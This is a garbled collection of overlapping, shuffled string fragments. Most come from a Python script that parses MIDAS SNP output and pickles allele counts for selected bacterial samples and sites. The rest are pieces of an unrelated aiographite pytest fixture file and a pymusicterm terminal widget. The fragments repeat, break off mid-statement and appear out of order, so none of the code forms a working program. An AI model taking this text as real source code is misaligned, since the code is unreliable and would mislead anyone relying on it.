('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # ===========================================================================", "as np from numpy.random import choice, random as np_random, randint import random from", "\\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\", "# Load information about site info_items = items[0].split(\"|\") contig = info_items[0] location =", "site (contig, location, gene_id) -> variant type variant_type_map = {} num_sites_processed = 0", "config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir) # Store", "num_sites_processed = 0 # Loop over sites in annotated_snps.txt file for line in", "num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items =", "'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts for specific samples at specific", "output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # Process allele information", "things subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory ddir = config.data_directory pdir", "samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split() #", "in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for gene_id,", "samples within the host desired_samples = [] for subject in subjects: desired_samples +=", "= [float(num) for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] =", "count allele_counts_map = defaultdict(dict) # Map: site (contig, location, gene_id) -> variant type", "specific samples at specific sites # where sites are provided as (contig, location,", "processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items = line.split() # Load information about", "sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map),", "inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\", "as (contig, location, gene_id) tuples # TODO: move to parse_midas_data later # ===========================================================================", "# ===================================================================== # Process allele information # ===================================================================== # sample -> site ->", "(contig, location, gene_id) -> allele count allele_counts_map = defaultdict(dict) # Map: site (contig,", "Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists", "[] for gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired", "snps_dir, 'r') # Get lists of desired sample idxs items = snp_file.readline().strip().split()[1:] samples", "note R was assigned indiscriminately pvalue = float(info_items[5]) # Only look at sites", "num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close()", "sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample", "bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # Process allele information # ===================================================================== #", "information about site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele", "line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed", "tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614',", "desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts for specific", "5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]),", "desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]),", "Load a few things subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory ddir", "Reformat sites desired_sites = [] for gene_id, contig, location in sites: desired_sites.append((contig, location,", "===================================================================== # Process allele information # ===================================================================== # sample -> site -> (ref", "continue # Store variant type variant_type_map[(contig, location, gene_name)] = variant_type # Store alt", "gene_id, contig, location tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955',", "in annotated_snps.txt file for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites", "allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map = su.parse_subject_sample_map() # Set", "9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]),", "alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information # ===================================================================== # Open post-processed", "= [] for subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites", "(config.data_directory, species_name) # Load population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name,", "[('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283',", "# Reformat sites desired_sites = [] for gene_id, contig, location in sites: desired_sites.append((contig,", "sites desired_sites = [] for gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id))", "# (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661',", "allele counts for specific samples at specific sites # where sites are provided", "(for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output", "# Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' % (pdir, ('_').join(subjects), species), 'wb'))", "# ===================================================================== # sample -> site -> (ref allele, alt allele) sample_site_allele_dict =", "snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs", "\\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\", "Only look at sites of interest if (contig, location, gene_name) not in desired_sites:", "interest if (contig, location, gene_name) not in desired_sites: continue # Store variant type", "version without gene names desired_sites_no_gene = [(contig, location) for contig, location, gene_id in", "\\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\", "substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from numpy.random import", "snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs (for polarization purposes)", "\"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs (for polarization purposes) population_freqs =", "numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location, gene_id) -> allele count allele_counts_map", "= ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts for specific samples", "\\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960),", "# ===================================================================== # Process annotated_snps information # ===================================================================== # Open post-processed MIDAS output", "as gene_id, contig, location tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\", "type variant_type_map = {} num_sites_processed = 0 # Loop over sites in annotated_snps.txt", "import numpy as np from numpy.random import choice, random as np_random, randint import", "info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if", "annotated_snps.txt file for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\"", "desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' % (pdir, ('_').join(subjects), species),", "a few things subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory ddir =", "float(info_items[5]) # Only look at sites of interest if (contig, location, gene_name) not", "gene_diversity_utils import numpy as np from numpy.random import choice, random as np_random, randint", "annotated_snps information # ===================================================================== # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" %", "sites # where sites are provided as (contig, location, gene_id) tuples # TODO:", "<gh_stars>0 # Script to pickle very specific information (allele identity and counts) #", "Load population freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open", "line.split() # Load information about site info_items = items[0].split(\"|\") contig = info_items[0] location", "# Store these two dicts for each host-species pair for subjects, species, sites", "pair for subjects, species, sites in desired_host_species_sites: # Get all samples within the", "= variant_type # Store alt and depth counts at this site for all", "desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location, gene_id) -> allele", "pdir) # Store these two dicts for each host-species pair for subjects, species,", "desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file:", "alt and depth counts at this site for all desired samples for idx", "ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir)", "= numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split() # Load information about", "% pdir) # Store these two dicts for each host-species pair for subjects,", "# SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs", "(ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\"", "desired_sites: continue # Store variant type variant_type_map[(contig, location, gene_name)] = variant_type # Store", "choice, random as np_random, randint import random from collections import defaultdict import pickle", "'r') # Get lists of desired sample idxs items = snp_file.readline().strip().split()[1:] samples =", "import defaultdict import pickle import bz2 import numpy import os, sys # Desired", "info_items[2] variant_type = info_items[3] polarization = 'R' # note R was assigned indiscriminately", "124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]),", "# Map: site (contig, location, gene_id) -> variant type variant_type_map = {} num_sites_processed", "= info_items[3] polarization = 'R' # note R was assigned indiscriminately pvalue =", "to pickle very specific information (allele identity and counts) # for small set", "alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir,", "import numpy import os, sys # Desired samples and sites # sites are", "[('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96',", "'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815',", "utils import sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import", "sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items = line.split() # Load information", "Loop over sites in annotated_snps.txt file for line in snp_file: if num_sites_processed>0 and", "info_items[2] if (contig, location) not in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele", "desired_samples = [] for subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites", "for idx in desired_sample_idxs: alt, depth = [float(num) for num in items[1+idx].split(\",\")] sample", "===================================================================== # Process annotated_snps information # ===================================================================== # Open post-processed MIDAS output snp_file", "look at sites of interest if (contig, location, gene_name) not in desired_sites: continue", "desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' % (pdir, ('_').join(subjects),", "and sites # sites are given as gene_id, contig, location tuples # inconsistent", "\\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\", "variant type variant_type_map[(contig, location, gene_name)] = variant_type # Store alt and depth counts", "(['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'],", "desired sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for", "names desired_sites_no_gene = [(contig, location) for contig, location, gene_id in desired_sites] # SNPs", "in desired_host_species_sites: # Get all samples within the host desired_samples = [] for", "sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items =", "= bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs =", "idx in desired_sample_idxs: alt, depth = [float(num) for num in items[1+idx].split(\",\")] sample =", "and depth counts at this site for all desired samples for idx in", "polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file", "su.parse_subject_sample_map() # Set up pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" %", "def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene =", "pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s'", "given as gene_id, contig, location tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'],", "variant_type_map # Load a few things subject_sample_map = su.parse_subject_sample_map() # Set up pickle", "(contig, location, gene_name) not in desired_sites: continue # Store variant type variant_type_map[(contig, location,", "subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for gene_id, contig,", "= info_items[2] if (contig, location) not in desired_sites_no_gene: continue for idx in desired_sample_idxs:", "'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001',", "variant_type_map[(contig, location, gene_name)] = variant_type # Store alt and depth counts at this", "# Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get", "gene_id) -> variant type variant_type_map = {} num_sites_processed = 0 # Loop over", "(num_sites_processed/10000)) num_sites_processed += 1 items = line.split() # Load information about site info_items", "for subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites = []", "[('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32',", "snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from numpy.random import choice, random as", "long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization = 'R' # note R", "Get all samples within the host desired_samples = [] for subject in subjects:", "given QP pairs at given sites from utils import sample_utils as su, parse_midas_data,", "np from numpy.random import choice, random as np_random, randint import random from collections", "samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location, gene_id)", "post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of", "in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in", "config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from numpy.random import choice,", "desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split() # Load", "sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process", "gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few", "variant_type = info_items[3] polarization = 'R' # note R was assigned indiscriminately pvalue", "contig, location in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict,", "= list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if sample in samples:", "# for small set of given QP pairs at given sites from utils", "[(contig, location) for contig, location, gene_id in desired_sites] # SNPs directory snps_dir =", "('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele", "= 'R' # note R was assigned indiscriminately pvalue = float(info_items[5]) # Only", "# Desired samples and sites # sites are given as gene_id, contig, location", "gene_id) -> allele count allele_counts_map = defaultdict(dict) # Map: site (contig, location, gene_id)", "= defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items =", "= numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location, gene_id) -> allele count", "5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925),", "gene_id in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) #", "0 # Loop over sites in annotated_snps.txt file for line in snp_file: if", "1 items = line.split() # Load information about site info_items = items[0].split(\"|\") contig", "sample -> site (contig, location, gene_id) -> allele count allele_counts_map = defaultdict(dict) #", "for contig, location, gene_id in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" %", "for gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts", "parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without", "in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed +=", "desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population", "allele information # ===================================================================== # sample -> site -> (ref allele, alt allele)", "desired_sites = [] for gene_id, contig, location in sites: desired_sites.append((contig, location, gene_id)) #", "location, gene_name) not in desired_sites: continue # Store variant type variant_type_map[(contig, location, gene_name)]", "in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample", "desired_sample_idxs: alt, depth = [float(num) for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig,", "-p %s' % pdir) # Store these two dicts for each host-species pair", "35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])]", "['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts for specific samples at", "numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items = line.split() # Load information about site", "at specific sites # where sites are provided as (contig, location, gene_id) tuples" ]
[ "1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy',", "return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad', 53534, 1471640943), ('streeteasy', 13424,", "('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124,", "@pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia',", "('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [", "'::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124),", "performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [", "return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list():", "('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923),", "@pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad', 53534,", "def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223),", "metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad', 53534, 1471640943), ('streeteasy',", "metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def", "metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def", "return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list():", "[ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return", "pytest @pytest.fixture def metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return", "import pytest @pytest.fixture def metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp():", "@pytest.fixture def metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923", "def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture", "@pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)]", "<reponame>zillow/aiographite import pytest @pytest.fixture def metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def", "['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return", "return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad', 53534),", "'<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow',", "def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad', 53534, 1471640943),", "124), ('trulia', 223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow',", "223), ('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958),", "def metric_parts(): return ['sproc performance', '<EMAIL>', '::EH12'] @pytest.fixture def timestamp(): return 1471640923 @pytest.fixture", "('hotpad', 53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia',", "53534), ('streeteasy', 13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223,", "13424)] @pytest.fixture def metric_value_timestamp_list(): return [ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad',", "[ ('zillow', 124, 1471640958), ('trulia', 223, 1471640923), ('hotpad', 53534, 1471640943), ('streeteasy', 13424, 1471640989)]", "timestamp(): return 1471640923 @pytest.fixture def metric_value_tuple_list(): return [ ('zillow', 124), ('trulia', 223), ('hotpad'," ]
[ "import compute_clusters from django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate clusters for", "import BaseCommand class Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.' def handle(self,", "clusters for AedeSpot app.' def handle(self, *args, **options): ''' Computing clusters. ''' compute_clusters()", "from django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.'", "BaseCommand class Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.' def handle(self, *args,", "aedes_server.core.clusters import compute_clusters from django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate clusters", "'Calculate clusters for AedeSpot app.' def handle(self, *args, **options): ''' Computing clusters. '''", "Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.' def handle(self, *args, **options): '''", "help = 'Calculate clusters for AedeSpot app.' def handle(self, *args, **options): ''' Computing", "class Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.' def handle(self, *args, **options):", "compute_clusters from django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate clusters for AedeSpot", "= 'Calculate clusters for AedeSpot app.' def handle(self, *args, **options): ''' Computing clusters.", "django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate clusters for AedeSpot app.' def", "from aedes_server.core.clusters import compute_clusters from django.core.management import BaseCommand class Command(BaseCommand): help = 'Calculate" ]
[ "_initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path) return text def", "self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected", "from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet", "def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path) return text", "_row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def", "text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that configure the widget \"\"\"", "pymusicterm.music import SongFile from pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2", "text=\"\"\" Actual path: {} No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass", "return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\" Function that configure the widget", "{} No Song Selected \"\"\".format(file_path) return text def set_song_info(self,song_file:SongFile): pass def __config(self): \"\"\"", "import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet):", "_column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\"", "pymusicterm.util.file import File, FileMetadata class SongInfoBlockLabel: _row:int=0 _column:int=2 _row_span:int=2 _column_span:int=3 _center:bool=False window:py_cui.widget_set.WidgetSet def", "def __init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): file_path=File().get_file_path() text=\"\"\" Actual path: {}", "__init__(self,window:py_cui.widget_set.WidgetSet): self.window=window self.block_label=self.window.add_block_label(self._initial_text(),self._row,self._column, row_span=self._row_span,column_span=self._column_span,center=self._center) self.__config() def _initial_text(self): 